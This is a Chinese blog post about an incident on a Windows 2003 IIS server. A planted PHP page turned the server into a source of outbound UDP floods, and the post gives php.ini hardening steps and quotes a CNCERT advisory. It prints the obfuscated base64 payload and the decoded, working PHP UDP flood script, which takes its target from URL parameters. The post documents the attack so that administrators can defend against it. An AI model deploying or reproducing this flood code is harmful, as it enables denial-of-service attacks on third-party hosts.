PHPDDOS win2003遭受udp攻击,网络带宽占用大,导致网络堵塞

服务器症状:服务器带宽应用占到70-100%,网络堵塞,网站无法访问,连系统自带远程控制也连接不上!
症状分析:
⒈通过服务器“本地连接状态”可以看到,发送的字节增长速度很快(几乎10m/s),收到的字节很少!
在cmd 里用 netstat -an 查看到服务器连接的都是同一个ip ,端口都是连续的 。
根据这个可以判定不是DDOS攻击,因为DDOS是不断收到大量数据包。
⒉关闭iis,带宽过一会就正常, 可以判定是网站导致的!然后一个个网站排查(从来没有见过这样的情况,通过页面调用往外发包的)!
排查方法:
IIS6,IIS7中查看w3wp进程:http://hi.baidu.com/yfyh1001/blog/item/f01ca4521ad1eb010df3e38b.html
⒊找到问题网站就好了,打开网站发现代码是用php写的,然后用简单的木马扫描软件扫了下,没有发现异常。
最后在网上搜索了下 “php 带宽” ,找到原因了 !
以下是摘自网络:


工作原理:
通过url传递IP和端口以udp的方式打开.传递文件到服务器写出。
解决方法:
在c:/windows/php.ini里设置:
disable_functions =gzinflate;
在c:/windows/php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
前面的;号要保留
然后重启IIS
如果设置了问题还没有解决,可以尝试把udp端口关闭 !
IPSEC设置(关闭udp)文档下载地址:
http://download.csdn.net/source/3212165
相关公告:
警惕利用PHP漏洞的网页篡改和攻击

  1月11日,CNCERT/CC收到韩国KrCERT/CC的事件报告称,韩国最近大量发生的网页篡改事件源于PHP网页公告板漏洞,并提醒Web应用的用户尽快安装补丁采取措施进行防范。鉴于PHP网页公告板是各类网站的常用服务程序,因此,国内的网站同样会受到漏洞的威胁。

  据KrCERT/CC消息,从2004年12月28日至2005年1月4日,韩国有2300多个首页被篡改,很多主页都被托管在IDC中的同一台服务器上。通常一台网页托管服务器可托管成百上千个首页(网站),如果一个首页有漏洞,则服务器中的其它首页都会受到影响。在KrCERT/CC提供的案例中,很多被篡改网页使用了韩国本土开发的开放源码公告板应用程序。

  CNCERT/CC正在关注此类事件的发展,如果您遇到与此有关的网页篡改事件,请及时向CNCERT/CC报告。

受影响的平台:

  PHP 4.3.x
  PHP 5.0.x
  phpBB 2.0.x
  更多开放源码的PHP应用程序均可能受到影响

解决方案:

  建议及时安装补丁。

  针对phpBB,建议升级至2.0.11及以后版本,补丁下载地址:
  http://www.phpbb.com/downloads.php

  针对PHP,建议升级至4.3.10或5.0.3及以后版本,补丁下载地址:
  http://www.php.net/downloads.php

  另外,可做一些安全设置如下:
        -------------------------------http://www.rekfan.com----------------------------------
  * 如果网站不需要远程页面操作,可关闭allow-url_fopen选项,禁止URL被作为一个文件;
  * 关闭register_globals选项,禁止输入变量被用作WEB服务器上的一个全球变量(除非有特定程序需要全球变量);
  * 建议关闭display_errors选项,禁止向客户端显示任何消息。甚至PHP起始页错误选项也可以关闭;
  * 但log_errors选项需要保留。

  总之,网站管理员需要关注系统漏洞和安全补丁,做好安全设置,对于由用户自行维护的网页也要警惕。特别是BBS服务,最好不要让用户安装自己的BBS,而是由IDC或托管服务商提供经过安全配置的BBS服务。另外,将BBS系统用独立的服务器运行也是安全措施之一。启用日志服务有助于一旦事件发生后的调查工作。
tags: php漏洞 php udp攻击 php 带宽 rekfan.com php socketsserver2003 php 网络应用100% php攻击 php网络
入侵的原理:
用户程序中的一个php页面的原代码:
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
经过N次解密后的代码:
$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand

";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s n";
?>


上一篇: WordPress数据备份仅有frm不可恢复
下一篇: IIS 对外UDP攻击 php对外UDP攻击
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志:
评论: 826 | 引用: 0 | 查看次数: 15166
Magaret[2017-11-13 04:30 PM | | Mail To:magaretsimpkins@live.de | 191.96.253.126 | del | 通过审核 | 回复回复]
[此评论正在审核中,只有博主及评论作者可见]
Marcelo[2017-09-15 04:19 AM | | Mail To:marceloaguiar@freenet.de | 107.175.34.26 | del | 通过审核 | 回复回复]
[此评论正在审核中,只有博主及评论作者可见]
Cortez[2017-08-13 00:48 AM | | Mail To:cortez.farquharson@gmail.com | 94.176.173.74 | del | 通过审核 | 回复回复]
[此评论正在审核中,只有博主及评论作者可见]
发表评论
昵 称:
密 码: 游客发言不需要密码.
邮 箱: 邮件地址支持Gravatar头像,邮箱地址不会公开.
网 址: 输入网址便于回访.
内 容:
验证码:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 关闭 | [img]标签 关闭